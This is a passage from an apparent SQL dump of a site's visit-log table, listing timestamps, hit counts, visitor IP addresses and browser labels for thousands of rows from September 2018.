305259,1537430093,1,1,0,0,'54.36.148.86','other'),(305260,1537430631,1,1,0,0,'54.36.149.68','other'),(305261,1537430665,1,1,0,0,'54.36.148.250','other'),(305262,1537430933,1,1,0,0,'54.36.148.176','other'),(305263,1537431550,1,1,0,0,'54.36.148.29','other'),(305264,1537431575,1,1,0,0,'54.36.148.253','other'),(305265,1537431609,5,5,0,0,'159.65.24.22','chrome'),(305266,1537431740,1,1,0,0,'54.36.148.80','other'),(305267,1537432012,8,8,0,0,'195.154.173.101','firefox'),(305268,1537432124,3,3,0,0,'144.76.96.236','other'),(305269,1537432276,1,1,0,0,'54.36.148.210','other'),(305270,1537432334,1,1,0,0,'54.36.148.214','other'),(305271,1537432791,1,1,0,0,'54.36.148.228','other'),(305272,1537432979,1,1,0,0,'54.36.148.177','other'),(305273,1537433009,1,1,0,0,'37.53.96.185','chrome'),(305274,1537433104,1,1,0,0,'8.29.198.27','other'),(305275,1537433207,1,1,0,0,'54.36.149.56','other'),(305276,1537433240,1,1,0,0,'54.36.148.255','other'),(305277,1537433242,1,1,0,0,'93.72.202.250','other'),(305278,1537433244,1,1,0,0,'54.36.149.67','other'),(305279,1537433451,1,1,0,0,'178.95.24.97','chrome'),(305280,1537433557,1,1,0,0,'54.36.149.85','other'),(305281,1537433700,1,1,0,0,'178.212.239.254','chrome'),(305282,1537433703,1,1,0,0,'54.36.148.46','other'),(305283,1537433762,1,1,0,0,'178.154.244.29','other'),(305284,1537433882,3,3,0,0,'178.154.244.11','other'),(305285,1537434050,1,1,0,0,'54.36.148.173','other'),(305286,1537434166,1,1,0,0,'54.36.148.63','other'),(305287,1537434287,1,1,0,0,'54.36.149.2','other'),(305288,1537434291,3,3,0,0,'91.196.177.46','chrome'),(305289,1537434293,1,1,0,0,'54.36.148.161','other'),(305290,1537434426,1,1,0,0,'40.77.167.107','other'),(305291,1537434536,2,2,0,0,'94.179.147.128','chrome'),(305292,1537434608,1,1,0,0,'178.154.244.65','other'),(305293,1537434721,1,1,0,0,'54.36.148.152','other'),(305294,1537434807,1,1,0,0,'54.36.149.84','other'),(305295,1537434983,2,2,0,0,'178.154.244.11','other'),(305296,1537435191,4,4,0,0,'178.154.244.29','other'),(305297,1537435212,1,1,0,0,'54.36.148.122','other'),(305298,1537435227,2,2,0,0,'54.36.149.105','other'),(305299,1537435237,1,0,1,0,'66.249.73.91',''),(305300,1537435308,1,1,0,0,'54.36.148.237','other'),(305301,1537435381,1,1,0,0,'5.45.207.19','other'),(305302,1537435508,1,1,0,0,'54.36.148.174','other'),(305303,1537435873,1,1,0,0,'54.36.149.92','other'),(305304,1537436033,1,1,0,0,'46.211.157.127','chrome'),(305305,1537436074,2,2,0,0,'178.154.244.11','other'),(305306,1537436124,1,1,0,0,'54.36.148.85','other'),(305307,1537436178,1,1,0,0,'54.36.149.80','other'),(305308,1537436471,1,1,0,0,'54.36.149.56','other'),(305309,1537436581,1,1,0,0,'54.36.149.10','other'),(305310,1537436607,1,1,0,0,'54.36.148.204','other'),(305311,1537436765,5,5,0,0,'178.154.244.29','other'),(305312,1537437001,1,1,0,0,'213.180.203.9','other'),(305313,1537437010,1,1,0,0,'93.78.212.202','other'),(305314,1537437141,3,3,0,0,'178.154.244.11','other'),(305315,1537437220,1,1,0,0,'54.36.148.205','other'),(305316,1537437436,1,1,0,0,'54.36.148.206','other'),(305317,1537437508,1,1,0,0,'54.36.148.82','other'),(305318,1537437523,1,1,0,0,'54.36.148.12','other'),(305319,1537437561,1,1,0,0,'54.36.148.244','other'),(305320,1537437865,1,1,0,0,'141.8.142.103','other'),(305321,1537437878,1,1,0,0,'54.36.148.176','other'),(305322,1537438030,1,1,0,0,'5.45.207.19','other'),(305323,1537438192,2,2,0,0,'94.45.145.8','chrome'),(305324,1537438267,2,2,0,0,'178.154.244.29','other'),(305325,1537438304,1,1,0,0,'95.108.213.4','other'),(305326,1537438409,1,1,0,0,'5.45.207.79','other'),(305327,1537438580,1,1,0,0,'54.36.148.102','other'),(305328,1537438595,1,1,0,0,'54.36.148.122','other'),(305329,1537438665,1,1,0,0,'54.36.148.163','other'),(305330,1537439335,1,1,0,0,'180.76.15.28','other'),(305331,1537439447,1,1,0,0,'95.134.47.126','chrome'),(305332,1537439476,1,1,0,0,'54.36.149.103','other'),(305333,1537439494,1,1,0,0,'8.29.198.27','other'),(305334,1537439605,1,1,0,0,'8.29.198.25','other'),(305335,1537439675,1,1,0,0,'54.36.148.106','other'),(305336,1537439677,1,1,0,0,'54.36.148.51','other'),(305337,1537439708,1,1,0,0,'54.36.149.99','other'),(305338,1537439747,5,5,0,0,'178.154.244.29','other'),(305339,1537439880,2,2,0,0,'178.154.244.11','other'),(305340,1537439938,1,1,0,0,'54.36.148.246','other'),(305341,1537439979,1,1,0,0,'54.36.148.65','other'),(305342,1537440080,1,1,0,0,'91.196.178.104','chrome'),(305343,1537440147,1,1,0,0,'54.36.148.114','other'),(305344,1537440316,2,2,0,0,'5.45.207.79','other'),(305345,1537440325,1,1,0,0,'54.36.149.87','other'),(305346,1537440329,1,1,0,0,'54.36.148.154','other'),(305347,1537440523,1,1,0,0,'54.36.148.29','other'),(305348,1537440735,2,2,0,0,'178.154.244.29','other'),(305349,1537440776,1,1,0,0,'54.36.148.199','other'),(305350,1537440793,1,1,0,0,'54.36.148.69','other'),(305351,1537440916,1,1,0,0,'141.8.142.103','other'),(305352,1537441132,3,3,0,0,'5.45.207.19','other'),(305353,1537441309,1,1,0,0,'54.36.148.131','other'),(305354,1537441641,1,1,0,0,'54.36.148.252','other'),(305355,1537441771,1,1,0,0,'54.36.148.204','other'),(305356,1537441835,3,3,0,0,'178.154.244.29','other'),(305357,1537441873,1,1,0,0,'54.36.149.65','other'),(305358,1537441882,1,1,0,0,'54.36.149.79','other'),(305359,1537441887,1,1,0,0,'54.36.148.152','other'),(305360,1537442017,1,1,0,0,'158.69.225.37','other'),(305361,1537442039,1,1,0,0,'158.69.225.37','chrome'),(305362,1537442176,2,2,0,0,'178.154.244.11','other'),(305363,1537442261,1,1,0,0,'54.36.148.156','other'),(305364,1537442510,1,1,0,0,'54.36.148.11','other'),(305365,1537442652,1,1,0,0,'54.36.148.165','other'),(305366,1537442653,8,8,0,0,'195.154.173.101','firefox'),(305367,1537442715,1,1,0,0,'54.36.148.57','other'),(305368,1537442778,1,1,0,0,'216.244.66.241','other'),(305369,1537442920,2,2,0,0,'178.154.244.29','other'),(305370,1537442925,1,1,0,0,'54.36.148.254','other'),(305371,1537442933,2,2,0,0,'5.9.156.30','other'),(305372,1537442942,1,1,0,0,'54.36.148.191','other'),(305373,1537443262,1,1,0,0,'54.36.149.55','other'),(305374,1537443331,1,1,0,0,'66.249.64.219','chrome'),(305375,1537443441,1,1,0,0,'54.36.148.166','other'),(305376,1537443463,2,2,0,0,'178.154.244.11','other'),(305377,1537443714,1,1,0,0,'54.36.148.232','other'),(305378,1537443896,1,1,0,0,'54.36.149.1','other'),(305379,1537443945,1,1,0,0,'8.29.198.27','other'),(305380,1537443987,1,1,0,0,'40.77.167.107','other'),(305381,1537444038,2,2,0,0,'178.154.244.29','other'),(305382,1537444243,1,1,0,0,'54.36.148.29','other'),(305383,1537444390,1,1,0,0,'54.36.148.54','other'),(305384,1537444442,1,1,0,0,'54.36.149.26','other'),(305385,1537445174,1,1,0,0,'54.36.149.66','other'),(305386,1537445197,1,1,0,0,'192.169.136.221','firefox'),(305387,1537445362,1,1,0,0,'54.36.148.43','other'),(305388,1537445434,1,1,0,0,'54.36.148.209','other'),(305389,1537445457,1,1,0,0,'157.55.39.190','other'),(305390,1537445508,1,1,0,0,'54.36.148.148','other'),(305391,1537445573,1,1,0,0,'178.154.244.11','other'),(305392,1537445647,1,1,0,0,'54.36.148.107','other'),(305393,1537445699,1,1,0,0,'40.77.167.107','other'),(305394,1537445703,1,1,0,0,'54.36.148.218','other'),(305395,1537445781,1,1,0,0,'54.36.148.32','other'),(305396,1537445862,1,1,0,0,'54.36.148.168','other'),(305397,1537445888,1,1,0,0,'5.83.17.200','chrome'),(305398,1537445897,1,1,0,0,'54.36.148.193','other'),(305399,1537445914,1,1,0,0,'54.36.148.11','other'),(305400,1537445967,1,1,0,0,'185.155.88.24','chrome'),(305401,1537446608,2,2,0,0,'91.196.177.46','chrome'),(305402,1537446667,1,1,0,0,'188.230.43.254','other'),(305403,1537447015,1,1,0,0,'54.36.148.179','other'),(305404,1537447046,1,1,0,0,'54.36.149.71','other'),(305405,1537447384,1,1,0,0,'54.36.148.127','other'),(305406,1537447388,1,1,0,0,'54.36.149.12','other'),(305407,1537447499,1,1,0,0,'54.36.148.22','other'),(305408,1537447548,1,1,0,0,'54.36.148.30','other'),(305409,1537447591,1,1,0,0,'54.36.148.21','other'),(305410,1537447756,1,1,0,0,'54.36.148.85','other'),(305411,1537447925,1,1,0,0,'207.46.13.28','other'),(305412,1537448048,1,1,0,0,'54.36.148.72','other'),(305413,1537448095,1,1,0,0,'54.36.148.223','other'),(305414,1537448149,1,1,0,0,'54.36.148.116','other'),(305415,1537448480,1,1,0,0,'216.244.66.241','other'),(305416,1537448929,1,1,0,0,'66.249.64.137','chrome'),(305417,1537449237,1,1,0,0,'54.36.148.225','other'),(305418,1537449257,1,1,0,0,'54.36.149.80','other'),(305419,1537449339,1,1,0,0,'54.36.148.173','other'),(305420,1537449513,1,1,0,0,'54.36.148.77','other'),(305421,1537449634,1,1,0,0,'95.108.213.4','other'),(305422,1537449882,1,1,0,0,'54.36.148.13','other'),(305423,1537449941,1,1,0,0,'54.36.149.100','other'),(305424,1537450065,1,1,0,0,'95.132.46.179','firefox'),(305425,1537450169,1,1,0,0,'54.36.148.81','other'),(305426,1537450322,1,1,0,0,'8.29.198.25','other'),(305427,1537450450,1,1,0,0,'8.29.198.26','other'),(305428,1537450516,1,1,0,0,'91.196.178.189','chrome'),(305429,1537450543,1,1,0,0,'91.196.178.135','firefox'),(305430,1537450729,1,1,0,0,'54.36.149.62','other'),(305431,1537450827,1,1,0,0,'54.36.148.157','other'),(305432,1537450931,1,1,0,0,'54.36.148.41','other'),(305433,1537450945,1,1,0,0,'54.36.149.87','other'),(305434,1537451047,1,1,0,0,'216.244.66.241','other'),(305435,1537451144,1,1,0,0,'54.36.148.105','other'),(305436,1537451349,1,1,0,0,'54.36.148.121','other'),(305437,1537451443,1,1,0,0,'54.36.148.233','other'),(305438,1537451486,1,1,0,0,'180.76.15.19','other'),(305439,1537451523,1,1,0,0,'54.36.148.244','other'),(305440,1537451622,1,1,0,0,'54.36.148.235','other'),(305441,1537451709,1,1,0,0,'31.128.105.37','chrome'),(305442,1537452014,1,1,0,0,'54.36.148.138','other'),(305443,1537452108,1,1,0,0,'37.55.133.37','chrome'),(305444,1537452424,2,2,0,0,'54.36.149.47','other'),(305445,1537452622,1,1,0,0,'54.36.148.18','other'),(305446,1537452628,1,1,0,0,'54.36.149.97','other'),(305447,1537452855,1,1,0,0,'54.36.149.11','other'),(305448,1537452867,1,1,0,0,'54.36.148.64','other'),(305449,1537452993,1,1,0,0,'54.36.148.11','other'),(305450,1537453073,1,1,0,0,'54.36.148.243','other'),(305451,1537453126,1,1,0,0,'91.124.238.184','chrome'),(305452,1537453576,1,1,0,0,'54.36.148.102','other'),(305453,1537453698,1,1,0,0,'54.36.149.21','other'),(305454,1537453797,1,1,0,0,'54.36.148.234','other'),(305455,1537454198,1,1,0,0,'54.36.148.199','other'),(305456,1537454616,1,1,0,0,'54.36.148.11','other'),(305457,1537454776,1,1,0,0,'8.29.198.25','other'),(305458,1537454860,1,1,0,0,'54.36.149.74','other'),(305459,1537454997,1,1,0,0,'54.36.148.150','other'),(305460,1537455074,1,1,0,0,'54.36.148.118','other'),(305461,1537455397,1,1,0,0,'54.36.149.15','other'),(305462,1537455552,1,1,0,0,'54.36.148.88','other'),(305463,1537456008,1,1,0,0,'54.36.148.24','other'),(305464,1537456158,1,1,0,0,'216.244.66.241','other'),(305465,1537456192,1,1,0,0,'54.36.148.141','other'),(305466,1537456285,1,1,0,0,'180.76.15.156','other'),(305467,1537456551,1,1,0,0,'54.36.148.202','other'),(305468,1537456572,1,1,0,0,'66.249.66.156','chrome'),(305469,1537456746,2,2,0,0,'178.154.244.11','other'),(305470,1537456798,1,1,0,0,'54.36.148.241','other'),(305471,1537456840,1,1,0,0,'91.196.178.76','firefox'),(305472,1537457072,1,1,0,0,'54.36.148.209','other'),(305473,1537457437,1,1,0,0,'54.36.149.7','other'),(305474,1537457553,1,1,0,0,'54.36.149.102','other'),(305475,1537457668,1,1,0,0,'54.36.149.79','other'),(305476,1537457886,1,1,0,0,'54.36.149.30','other'),(305477,1537458125,1,1,0,0,'40.77.167.107','other'),(305478,1537458380,1,1,0,0,'54.36.148.116','other'),(305479,1537458561,1,1,0,0,'54.36.149.64','other'),(305480,1537458782,1,1,0,0,'5.45.207.19','other'),(305481,1537458984,1,1,0,0,'54.36.148.99','other'),(305482,1537459187,1,1,0,0,'54.36.149.70','other'),(305483,1537459198,1,1,0,0,'54.36.149.2','other'),(305484,1537459315,1,1,0,0,'54.36.149.99','other'),(305485,1537459330,1,1,0,0,'178.154.244.29','other'),(305486,1537459334,1,1,0,0,'178.154.244.11','other'),(305487,1537459393,1,1,0,0,'54.36.148.29','other'),(305488,1537459576,1,1,0,0,'188.230.43.254','other'),(305489,1537459970,1,1,0,0,'54.36.148.75','other'),(305490,1537460081,1,1,0,0,'54.36.148.62','other'),(305491,1537460156,1,1,0,0,'54.36.149.54','other'),(305492,1537460164,1,1,0,0,'54.36.148.50','other'),(305493,1537460175,1,1,0,0,'54.36.149.74','other'),(305494,1537460354,1,1,0,0,'54.36.148.10','other'),(305495,1537460457,1,1,0,0,'54.36.148.124','other'),(305496,1537460717,1,1,0,0,'54.36.149.77','other'),(305497,1537460761,1,1,0,0,'54.36.149.51','other'),(305498,1537460806,1,1,0,0,'54.36.149.99','other'),(305499,1537461014,1,1,0,0,'54.36.148.170','other'),(305500,1537461152,1,1,0,0,'8.29.198.26','other'),(305501,1537461249,1,1,0,0,'54.36.148.145','other'),(305502,1537461282,1,1,0,0,'8.29.198.25','other'),(305503,1537461330,1,1,0,0,'54.36.148.90','other'),(305504,1537461385,1,1,0,0,'54.36.149.42','other'),(305505,1537461636,1,1,0,0,'54.36.149.93','other'),(305506,1537461785,1,1,0,0,'54.36.148.119','other'),(305507,1537461922,1,1,0,0,'54.36.149.39','other'),(305508,1537461971,1,1,0,0,'188.230.43.254','other'),(305509,1537462106,1,1,0,0,'54.36.149.7','other'),(305510,1537462155,1,1,0,0,'54.36.148.189','other'),(305511,1537462352,1,1,0,0,'199.58.86.209','other'),(305512,1537462417,1,1,0,0,'178.154.244.29','other'),(305513,1537463055,2,2,0,0,'216.244.66.241','other'),(305514,1537463364,1,1,0,0,'54.36.149.14','other'),(305515,1537463638,1,1,0,0,'54.36.149.104','other'),(305516,1537464093,1,1,0,0,'178.154.244.29','other'),(305517,1537464337,1,1,0,0,'54.36.148.220','other'),(305518,1537464361,1,1,0,0,'54.36.148.163','other'),(305519,1537464367,1,1,0,0,'54.36.149.89','other'),(305520,1537464382,1,1,0,0,'188.230.43.254','other'),(305521,1537464478,1,1,0,0,'54.36.149.6','other'),(305522,1537464616,1,1,0,0,'54.36.148.81','other'),(305523,1537464947,1,1,0,0,'54.36.148.182','other'),(305524,1537465604,1,1,0,0,'8.29.198.25','other'),(305525,1537465816,1,1,0,0,'54.36.149.71','other'),(305526,1537466007,1,1,0,0,'54.36.148.244','other'),(305527,1537467415,1,1,0,0,'54.36.148.21','other'),(305528,1537467613,1,1,0,0,'54.36.148.104','other'),(305529,1537467933,1,1,0,0,'54.36.148.23','other'),(305530,1537468726,1,1,0,0,'216.244.66.241','other'),(305531,1537469411,1,1,0,0,'54.36.148.92','other'),(305532,1537469421,1,1,0,0,'91.196.178.75','firefox'),(305533,1537469471,1,1,0,0,'54.36.149.34','other'),(305534,1537469924,8,8,0,0,'5.9.140.242','other'),(305535,1537470136,1,1,0,0,'54.36.148.192','other'),(305536,1537470217,1,1,0,0,'54.36.149.20','other'),(305537,1537470325,1,1,0,0,'54.36.148.153','other'),(305538,1537470330,2,2,0,0,'178.154.244.29','other'),(305539,1537470355,1,1,0,0,'54.36.148.157','other'),(305540,1537470400,1,1,0,0,'46.211.1.47','chrome'),(305541,1537470582,1,1,0,0,'193.107.179.4','chrome'),(305542,1537470699,5,5,0,0,'69.30.221.250','other'),(305543,1537470855,2,2,0,0,'178.154.244.11','other'),(305544,1537471232,1,1,0,0,'54.36.148.180','other'),(305545,1537471313,1,1,0,0,'54.36.149.0','other'),(305546,1537471983,1,1,0,0,'8.29.198.26','other'),(305547,1537472119,1,1,0,0,'8.29.198.25','other'),(305548,1537472293,1,1,0,0,'54.36.148.123','other'),(305549,1537472446,1,1,0,0,'54.36.148.108','other'),(305550,1537472639,1,1,0,0,'54.36.148.152','other'),(305551,1537472718,1,1,0,0,'37.73.92.152','chrome'),(305552,1537472775,1,1,0,0,'46.211.0.134','chrome'),(305553,1537473143,1,1,0,0,'216.244.66.241','other'),(305554,1537474238,1,1,0,0,'35.202.99.105','other'),(305555,1537474359,1,1,0,0,'54.36.148.100','other'),(305556,1537474584,1,1,0,0,'54.36.148.198','other'),(305557,1537474949,1,1,0,0,'54.36.149.68','other'),(305558,1537475095,1,1,0,0,'91.225.141.26','chrome'),(305559,1537475187,1,1,0,0,'54.36.149.85','other'),(305560,1537475199,1,1,0,0,'95.163.255.115','other'),(305561,1537475202,1,1,0,0,'95.163.255.109','other'),(305562,1537475204,1,1,0,0,'95.163.255.118','other'),(305563,1537475259,1,1,0,0,'95.163.255.117','other'),(305564,1537475443,1,1,0,0,'178.154.244.29','other'),(305565,1537475602,1,1,0,0,'54.36.148.208','other'),(305566,1537476440,1,1,0,0,'8.29.198.25','other'),(305567,1537476609,1,1,0,0,'54.36.148.201','other'),(305568,1537477398,1,1,0,0,'54.36.149.22','other'),(305569,1537477593,1,1,0,0,'54.36.148.152','other'),(305570,1537477663,1,1,0,0,'54.36.148.138','other'),(305571,1537478134,1,1,0,0,'54.36.148.243','other'),(305572,1537479080,1,1,0,0,'146.120.225.179','chrome'),(305573,1537479511,1,1,0,0,'149.154.167.165','other'),(305574,1537479518,1,1,0,0,'104.249.46.5','chrome'),(305575,1537479892,1,1,0,0,'54.36.148.36','other'),(305576,1537479976,1,1,0,0,'5.188.210.52','chrome'),(305577,1537479977,1,1,0,0,'62.122.202.189','chrome'),(305578,1537480224,1,1,0,0,'54.36.148.18','other'),(305579,1537480550,1,1,0,0,'54.36.149.95','other'),(305580,1537480780,1,1,0,0,'54.36.149.29','other'),(305581,1537480896,1,1,0,0,'54.36.149.24','other'),(305582,1537480927,1,1,0,0,'54.36.148.194','other'),(305583,1537481127,5,5,0,0,'216.244.66.241','other'),(305584,1537481232,1,1,0,0,'54.36.149.21','other'),(305585,1537481310,1,1,0,0,'54.36.149.8','other'),(305586,1537481328,1,1,0,0,'54.36.148.76','other'),(305587,1537481351,1,1,0,0,'54.36.148.255','other'),(305588,1537481464,1,1,0,0,'54.36.148.228','other'),(305589,1537481529,1,1,0,0,'54.36.148.34','other'),(305590,1537481551,1,1,0,0,'54.36.149.67','other'),(305591,1537481900,1,1,0,0,'54.36.149.69','other'),(305592,1537482155,1,1,0,0,'54.36.148.243','other'),(305593,1537482269,1,1,0,0,'66.249.66.157','chrome'),(305594,1537482333,1,1,0,0,'54.36.149.45','other'),(305595,1537482402,1,1,0,0,'54.36.148.103','other'),(305596,1537482442,1,1,0,0,'54.36.148.12','other'),(305597,1537482776,1,1,0,0,'54.36.148.150','other'),(305598,1537482814,2,2,0,0,'8.29.198.26','other'),(305599,1537482992,1,1,0,0,'54.36.148.213','other'),(305600,1537483157,1,1,0,0,'54.36.149.80','other'),(305601,1537483519,1,1,0,0,'54.36.148.58','other'),(305602,1537483701,1,1,0,0,'216.244.66.241','other'),(305603,1537483985,1,1,0,0,'54.36.149.10','other'),(305604,1537484283,1,1,0,0,'54.36.148.160','other'),(305605,1537484437,1,1,0,0,'54.36.148.169','other'),(305606,1537485038,1,1,0,0,'54.36.148.79','other'),(305607,1537485075,1,1,0,0,'54.36.148.205','other'),(305608,1537485097,1,1,0,0,'66.249.66.59','chrome'),(305609,1537485346,1,1,0,0,'54.36.149.105','other'),(305610,1537486088,1,1,0,0,'54.36.148.26','other'),(305611,1537486300,1,1,0,0,'216.244.66.241','other'),(305612,1537486302,1,1,0,0,'54.36.148.244','other'),(305613,1537486621,1,1,0,0,'62.122.202.189','chrome'),(305614,1537486688,1,1,0,0,'52.53.201.78','chrome'),(305615,1537487107,1,1,0,0,'54.36.148.172','other'),(305616,1537487272,1,1,0,0,'8.29.198.26','other'),(305617,1537487524,1,1,0,0,'216.244.66.241','other'),(305618,1537488238,1,1,0,0,'54.36.148.158','other'),(305619,1537488298,1,1,0,0,'54.36.149.68','other'),(305620,1537488520,1,1,0,0,'40.77.167.212','other'),(305621,1537488603,1,1,0,0,'54.36.149.69','other'),(305622,1537489031,1,1,0,0,'54.36.148.66','other'),(305623,1537489292,1,1,0,0,'54.36.149.36','other'),(305624,1537489300,1,1,0,0,'178.154.244.11','other'),(305625,1537489442,1,1,0,0,'54.36.148.22','other'),(305626,1537489787,1,1,0,0,'54.36.148.188','other'),(305627,1537490038,5,5,0,0,'178.154.244.29','other'),(305628,1537490109,1,1,0,0,'216.244.66.241','other'),(305629,1537490193,1,1,0,0,'54.36.148.60','other'),(305630,1537490324,1,1,0,0,'54.36.148.111','other'),(305631,1537491004,2,2,0,0,'178.154.244.11','other'),(305632,1537491144,1,1,0,0,'5.45.207.79','other'),(305633,1537491189,2,2,0,0,'178.154.244.29','other'),(305634,1537491196,1,1,0,0,'54.36.148.85','other'),(305635,1537491416,1,1,0,0,'54.36.148.56','other'),(305636,1537491427,1,1,0,0,'54.36.148.225','other'),(305637,1537491679,1,0,1,0,'66.249.66.156',''),(305638,1537491898,1,1,0,0,'141.8.142.103','other'),(305639,1537491961,1,1,0,0,'54.36.148.149','other'),(305640,1537492248,1,1,0,0,'54.36.148.98','other'),(305641,1537492565,1,1,0,0,'54.36.149.95','other'),(305642,1537492572,1,1,0,0,'54.36.149.71','other'),(305643,1537492580,3,3,0,0,'178.154.244.29','other'),(305644,1537492584,3,3,0,0,'178.154.244.11','other'),(305645,1537492646,1,1,0,0,'54.36.148.186','other'),(305646,1537493302,1,1,0,0,'5.45.207.19','other'),(305647,1537493369,1,1,0,0,'37.9.113.148','other'),(305648,1537493467,1,1,0,0,'54.36.149.7','other'),(305649,1537493552,1,1,0,0,'54.36.148.220','other'),(305650,1537493573,1,1,0,0,'52.37.211.217','chrome'),(305651,1537493603,3,3,0,0,'178.154.244.29','other'),(305652,1537493646,1,1,0,0,'8.29.198.25','other'),(305653,1537493701,1,1,0,0,'54.36.148.187','other'),(305654,1537493793,1,1,0,0,'8.29.198.27','other'),(305655,1537494010,1,1,0,0,'54.36.148.225','other'),(305656,1537494257,1,1,0,0,'54.36.149.16','other'),(305657,1537494279,1,1,0,0,'66.249.66.156','chrome'),(305658,1537494529,1,1,0,0,'5.45.207.79','other'),(305659,1537494673,6,6,0,0,'178.154.244.29','other'),(305660,1537494800,1,1,0,0,'54.36.149.3','other'),(305661,1537495190,1,1,0,0,'40.77.167.212','other'),(305662,1537495256,2,2,0,0,'141.8.142.103','other'),(305663,1537495258,5,5,0,0,'178.154.244.11','other'),(305664,1537495380,3,3,0,0,'5.45.207.19','other'),(305665,1537495409,1,1,0,0,'54.36.148.84','other'),(305666,1537495422,1,1,0,0,'213.180.203.9','other'),(305667,1537495428,1,1,0,0,'54.36.148.93','other'),(305668,1537495611,1,1,0,0,'54.36.148.123','other'),(305669,1537495633,1,1,0,0,'54.36.149.11','other'),(305670,1537495727,1,1,0,0,'52.41.211.72','chrome'),(305671,1537495821,3,3,0,0,'5.45.207.79','other'),(305672,1537496082,3,3,0,0,'178.154.244.29','other'),(305673,1537496280,1,1,0,0,'54.36.148.109','other'),(305674,1537496473,1,1,0,0,'54.36.148.192','other'),(305675,1537496524,1,1,0,0,'54.36.148.199','other'),(305676,1537496553,1,1,0,0,'54.36.149.30','other'),(305677,1537496906,2,2,0,0,'178.154.244.11','other'),(305678,1537497005,3,3,0,0,'178.154.244.29','other'),(305679,1537497029,1,1,0,0,'216.244.66.241','other'),(305680,1537497035,1,1,0,0,'54.36.148.136','other'),(305681,1537497187,1,1,0,0,'54.36.149.80','other'),(305682,1537497204,1,1,0,0,'54.36.148.182','other'),(305683,1537497461,1,1,0,0,'54.36.148.86','other'),(305684,1537497592,1,1,0,0,'54.36.148.70','other'),(305685,1537497705,1,1,0,0,'54.36.148.206','other'),(305686,1537497862,4,4,0,0,'5.45.207.79','other'),(305687,1537497866,4,4,0,0,'178.154.244.11','other'),(305688,1537497912,1,1,0,0,'178.154.244.29','other'),(305689,1537497964,1,1,0,0,'5.45.207.19','other'),(305690,1537498100,1,1,0,0,'8.29.198.27','other'),(305691,1537498147,1,1,0,0,'66.249.66.157','chrome'),(305692,1537498158,1,1,0,0,'35.202.99.105','other'),(305693,1537498334,1,1,0,0,'54.36.149.91','other'),(305694,1537498480,1,1,0,0,'54.36.149.4','other'),(305695,1537498774,2,2,0,0,'178.154.244.11','other'),(305696,1537498964,1,1,0,0,'66.249.66.156','chrome'),(305697,1537499045,1,1,0,0,'54.36.149.37','other'),(305698,1537499083,1,1,0,0,'54.36.148.102','other'),(305699,1537499172,1,1,0,0,'178.154.244.29','other'),(305700,1537499194,1,1,0,0,'54.36.148.88','other'),(305701,1537499304,1,1,0,0,'66.249.66.157','chrome'),(305702,1537499338,1,1,0,0,'54.36.148.59','other'),(305703,1537499559,1,1,0,0,'54.36.149.78','other'),(305704,1537499983,3,3,0,0,'66.249.66.156','chrome'),(305705,1537499998,1,1,0,0,'54.36.149.82','other'),(305706,1537500218,1,1,0,0,'178.154.244.29','other'),(305707,1537500285,1,1,0,0,'54.36.149.34','other'),(305708,1537500291,1,1,0,0,'178.154.244.11','other'),(305709,1537500310,1,1,0,0,'5.45.207.19','other'),(305710,1537500323,3,3,0,0,'66.249.66.155','chrome'),(305711,1537500495,1,1,0,0,'66.249.66.157','chrome'),(305712,1537500960,1,1,0,0,'54.36.149.4','other'),(305713,1537501048,1,1,0,0,'54.36.149.1','other'),(305714,1537501190,1,1,0,0,'54.36.148.136','other'),(305715,1537501209,1,1,0,0,'54.36.148.252','other'),(305716,1537501403,1,1,0,0,'54.36.148.222','other'),(305717,1537501502,1,1,0,0,'66.249.66.157','chrome'),(305718,1537501522,3,3,0,0,'178.154.244.29','other'),(305719,1537501746,1,1,0,0,'178.154.244.11','other'),(305720,1537501946,1,1,0,0,'51.255.65.46','other'),(305721,1537502024,1,1,0,0,'54.36.149.80','other'),(305722,1537502158,1,1,0,0,'66.249.66.156','chrome'),(305723,1537502197,1,1,0,0,'54.36.148.34','other'),(305724,1537502463,1,1,0,0,'54.36.148.79','other'),(305725,1537502721,1,1,0,0,'54.36.148.81','other'),(305726,1537502958,1,1,0,0,'66.249.66.157','chrome'),(305727,1537503057,1,1,0,0,'54.36.148.226','other'),(305728,1537503119,1,1,0,0,'54.36.148.111','other'),(305729,1537503126,1,1,0,0,'54.36.148.231','other'),(305730,1537503601,1,1,0,0,'54.36.148.158','other'),(305731,1537503936,1,1,0,0,'54.36.149.47','other'),(305732,1537504051,1,1,0,0,'54.36.148.135','other'),(305733,1537504224,1,1,0,0,'178.154.244.11','other'),(305734,1537504289,1,1,0,0,'178.154.244.29','other'),(305735,1537504299,1,1,0,0,'87.250.224.47','other'),(305736,1537504346,1,1,0,0,'54.36.149.98','other'),(305737,1537504484,1,1,0,0,'8.29.198.26','other'),(305738,1537504570,1,1,0,0,'54.36.149.12','other'),(305739,1537504620,1,1,0,0,'8.29.198.27','other'),(305740,1537504896,1,1,0,0,'54.36.149.93','other'),(305741,1537505040,25,25,0,0,'95.216.41.162','other'),(305742,1537505093,1,1,0,0,'54.36.148.107','other'),(305743,1537505145,2,2,0,0,'146.52.206.3','other'),(305744,1537505369,4,4,0,0,'178.154.244.29','other'),(305745,1537505402,1,1,0,0,'5.45.207.19','other'),(305746,1537505455,3,3,0,0,'178.154.244.11','other'),(305747,1537505746,1,1,0,0,'54.36.149.92','other'),(305748,1537505842,1,1,0,0,'54.36.149.47','other'),(305749,1537505923,1,1,0,0,'66.249.66.157','chrome'),(305750,1537505964,1,1,0,0,'40.77.167.17','other'),(305751,1537506155,1,1,0,0,'5.45.207.79','other'),(305752,1537506205,1,1,0,0,'54.36.149.22','other'),(305753,1537506463,1,1,0,0,'54.36.148.164','other'),(305754,1537506591,1,1,0,0,'54.36.148.177','other'),(305755,1537506753,1,1,0,0,'54.36.148.194','other'),(305756,1537507292,1,1,0,0,'54.36.148.101','other'),(305757,1537507385,2,2,0,0,'216.244.66.241','other'),(305758,1537507392,3,3,0,0,'66.249.66.155','chrome'),(305759,1537507539,1,1,0,0,'54.36.149.10','other'),(305760,1537507585,1,1,0,0,'54.36.148.254','other'),(305761,1537508041,2,2,0,0,'66.249.66.156','chrome'),(305762,1537508205,2,2,0,0,'40.77.167.17','other'),(305763,1537508232,7,7,0,0,'40.77.167.212','other'),(305764,1537508244,2,2,0,0,'40.77.167.168','other'),(305765,1537508249,2,2,0,0,'40.77.167.18','other'),(305766,1537508441,1,1,0,0,'54.36.148.176','other'),(305767,1537508464,1,1,0,0,'54.36.148.63','other'),(305768,1537508472,1,1,0,0,'54.36.149.95','other'),(305769,1537508562,2,2,0,0,'66.249.66.155','chrome'),(305770,1537508597,1,1,0,0,'54.36.148.225','other'),(305771,1537508728,1,1,0,0,'66.249.66.157','chrome'),(305772,1537508928,1